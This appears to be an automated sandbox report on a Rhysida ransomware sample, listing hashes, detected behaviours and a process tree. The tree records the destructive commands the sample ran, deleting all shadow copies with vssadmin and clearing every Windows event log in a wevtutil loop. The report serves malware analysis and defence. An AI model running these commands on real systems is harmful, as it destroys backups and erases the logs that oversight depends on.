Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
21-11-2024 01:45
General
-
Target
2024-11-21_ddaa09b5c3bf5aa24e300c24905469f2_rhysida.exe
-
Size
497KB
-
MD5
ddaa09b5c3bf5aa24e300c24905469f2
-
SHA1
ebedfbe0a696bd87c4e2d27e3448a61f02bab021
-
SHA256
f06b905626d742ec5a1eab8027d9097b74fd0413a901d0599eac8555d1f89e50
-
SHA512
a1826d23ef54d75bdee465727f1609a12407923fdf951124f968ab204e92da079a73e71292f2eddb7f2187c169b422bb720df6cb185b8ca26111b324fd555db0
-
SSDEEP
6144:yFoCbN9uRhQW8HnuYqWrJhN7L6aMFNYkS+D5gtuMf9opagj7T:/qnTp7N78Y5e5gUG9o/
Score
10/10
Malware Config
Signatures
-
Detect Rhysida ransomware 5 IoCs
-
Rhysida
Rhysida is a ransomware that is written in C++ and discovered in 2023.
-
Rhysida family
-
Clears Windows event logs 1 TTPs 64 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (8113) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 1 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
-
Indicator Removal: Clear Persistence 1 TTPs 2 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
-
Power Settings 1 TTPs 1 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-11-21_ddaa09b5c3bf5aa24e300c24905469f2_rhysida.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-21_ddaa09b5c3bf5aa24e300c24905469f2_rhysida.exe"1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil.exe el5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DebugChannel"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Media Center"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Disk/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Documents/Performance"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EFS/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HAL/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Help/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Trace"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKE/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"4⤵
-
-
